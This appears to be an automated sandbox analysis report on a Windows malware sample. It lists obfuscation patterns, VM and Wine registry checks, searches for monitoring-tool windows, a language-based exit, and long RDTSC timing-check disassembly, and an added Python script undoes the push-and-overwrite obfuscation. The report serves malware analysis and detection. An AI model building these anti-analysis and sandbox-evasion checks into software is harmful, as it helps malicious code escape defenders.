Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], esi | 0_2_00A0D518
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 310F477Fh; mov dword ptr [esp], esp | 0_2_00A0D520
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push esi; mov dword ptr [esp], edx | 0_2_00A0D58B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 07A77AC7h; mov dword ptr [esp], ecx | 0_2_00A0D65A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 05B64D79h; mov dword ptr [esp], edi | 0_2_00A0D662
Source: XDPT5mgIBO.exe | Static PE information: section name: ogawuknu entropy: 7.953433173066681
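Every instruction pair listed under "Data Obfuscation" has the same shape: `push X; mov dword ptr [esp], Y` pushes a throw-away X and immediately overwrites that stack slot with Y, so the pair is just a `push Y` spelt in two instructions, and `push reg; ret` pops the register into EIP, i.e. an indirect `jmp reg`. The block below is an added example, not code from the report or from the sample: it normalises those pairs back to the single instruction they stand for, with the report's own pairs (function-address prefix and suffix removed) as input. The rewrite rules, and the caveat that `mov [esp], esp` does not reproduce a genuine `push esp`, are mine.

```python
"""Undo the push-then-overwrite obfuscation listed in the report.

Added example, not code from the report or the sample.  The input pairs are
the report's own Data Obfuscation lines with addresses stripped; the rewrite
rules are mine.
"""
import re

REG32 = r"e(?:ax|bx|cx|dx|si|di|bp|sp)"
OPERAND = r"[0-9A-Fa-f]+h|" + REG32      # MASM-style immediate or 32-bit register

PUSH_THEN_OVERWRITE = re.compile(
    rf"^push\s+(?P<dummy>{OPERAND})\s*;\s*mov\s+dword ptr \[esp\]\s*,\s*(?P<real>{OPERAND})$",
    re.IGNORECASE)
PUSH_RET = re.compile(rf"^push\s+(?P<reg>{REG32})\s*;\s*ret$", re.IGNORECASE)


def normalise(pair: str) -> str:
    """Return the single equivalent instruction, or the input unchanged."""
    pair = pair.strip()
    m = PUSH_THEN_OVERWRITE.match(pair)
    if m:
        real = m.group("real")
        if real.lower() == "esp":
            # Not identical to a real `push esp`: the mov stores esp *after* the
            # push, so the saved value is the original esp minus 4.
            return "push esp  ; caution: stores esp-4, not the pre-push esp"
        return f"push {real}"
    m = PUSH_RET.match(pair)
    if m:
        return f"jmp {m.group('reg')}"
    return pair


def deobfuscate(listing):
    """Pair each reported line with its normalised form."""
    return [(line, normalise(line)) for line in listing]


# Constructed from the report's Data Obfuscation lines (addresses stripped).
REPORTED_PAIRS = [
    "push 784E2553h; mov dword ptr [esp], ebx",
    "push eax; mov dword ptr [esp], esp",
    "push ebp; mov dword ptr [esp], 29AF872Dh",
    "push esi; mov dword ptr [esp], eax",
    "push ecx; ret",
    "push edi; mov dword ptr [esp], 4977C910h",
    "mov eax, dword ptr [esp+04h]",          # unrelated instruction, left alone
]

if __name__ == "__main__":
    for original, clean in deobfuscate(REPORTED_PAIRS):
        print(f"{original:45} -> {clean}")
```

The value of the rewrite is less the cleaner listing than the side effect on analysis: once the dummy immediates are gone, the remaining constants are the ones the code actually uses, and the `push reg; ret` sites are the indirect control transfers a disassembler's static call graph will have missed.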

                Boot Survival

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13592
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1B6E3, second address: A1B6E9, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DD94, second address: A1DD99, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DD99, second address: A1DD9E, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DD9E, second address: A1DDA4, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DDA4, second address: A1DDCC, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3D4C68E67h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DEB1, second address: A1DEB5, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DEB5, second address: A1DEC3, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DEC3, second address: A1DEE2, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4D82112h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DEE2, second address: A1DEF1, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1DEF1, second address: A1DF49, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jno 00007FA3D4D82121h 0x00000010 pop eax 0x00000011 jp 00007FA3D4D82109h 0x00000017 movzx edi, cx 0x0000001a lea ebx, dword ptr [ebp+1244FBBCh] 0x00000020 jmp 00007FA3D4D8210Eh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA3D4D8210Ch 0x0000002e jc 00007FA3D4D82106h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A1E17D, second address: A1E181, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | RDTSC instruction interceptor: First address: A3EA92, second address: A3EAAA, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3CBB2 second address: A3CBD1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E5Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D02B second address: A3D031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D154 second address: A3D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D162 second address: A3D16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FA3D4D82106h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D16F second address: A3D196 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4C68E65h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D196 second address: A3D19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D435 second address: A3D445 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E62h 0x00000008 jo 00007FA3D4C68E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D6F0 second address: A3D6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3D83A second address: A3D84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b jl 00007FA3D4C68E5Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB55 second address: A3DB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB5E second address: A3DB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB64 second address: A3DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB68 second address: A3DB81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB81 second address: A3DB8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FA3D4D82106h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3DB8E second address: A3DB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A35EF6 second address: A35F04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B16A second address: A0B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B170 second address: A0B17A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0B17A second address: A0B1A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FA3D4C68E56h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007FA3D4C68E58h 0x00000015 jo 00007FA3D4C68E5Eh 0x0000001b jng 00007FA3D4C68E56h 0x00000021 push edx 0x00000022 pop edx 0x00000023 jl 00007FA3D4C68E5Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E214 second address: A3E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E21A second address: A3E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4C2 second address: A3E4D2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4D2 second address: A3E4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E61h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E4E8 second address: A3E504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82118h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E8D1 second address: A3E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A3E8D5 second address: A3E8F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82116h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A45807 second address: A45811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3D4C68E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A100AD second address: A100B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A49DBE second address: A49DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A49F03 second address: A49F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82115h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4A368 second address: A4A36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4A4FE second address: A4A502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B64F second address: A4B653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B773 second address: A4B77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4B96E second address: A4B972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB61 second address: A4BB67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB67 second address: A4BB6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BB6C second address: A4BB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFD8 second address: A4BFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFDE second address: A4BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4BFE2 second address: A4BFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4C166 second address: A4C16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4DB49 second address: A4DB5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FA3D4C68E5Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4E1CC second address: A4E1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4E1D0 second address: A4E1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4EBAD second address: A4EBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 0BC96DC4h 0x00000010 push 00000000h 0x00000012 mov edi, esi 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2CDBh] 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A4FB37 second address: A4FBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA3D4C68E58h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor di, E347h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FA3D4C68E58h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3913h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FA3D4C68E58h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov esi, dword ptr [ebp+122D2858h] 0x00000057 push eax 0x00000058 jbe 00007FA3D4C68E7Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA3D4C68E5Fh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A50666 second address: A506B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FA3D4D82108h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b jmp 00007FA3D4D8210Ah 0x00000030 push eax 0x00000031 pushad 0x00000032 pushad 0x00000033 jnc 00007FA3D4D82106h 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A506B6 second address: A506BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5685C second address: A56871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A150EB second address: A15117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 jnc 00007FA3D4C68E56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A52529 second address: A52541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A53B5A second address: A53B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A15117 second address: A1511B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A52541 second address: A5254B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1511B second address: A15123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5A4BF second address: A5A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BAA4 second address: A5BABB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4D82108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FA3D4D82106h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5BABB second address: A5BAC5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5AC34 second address: A5AC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5AC3A second address: A5AC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C95E second address: A5C963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5C963 second address: A5C9FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA3D4C68E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+124631BCh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FA3D4C68E58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D222Eh], ebx 0x0000004e call 00007FA3D4C68E61h 0x00000053 and edi, dword ptr [ebp+122D3226h] 0x00000059 pop ebx 0x0000005a push 00000000h 0x0000005c adc di, B700h 0x00000061 xchg eax, esi 0x00000062 pushad 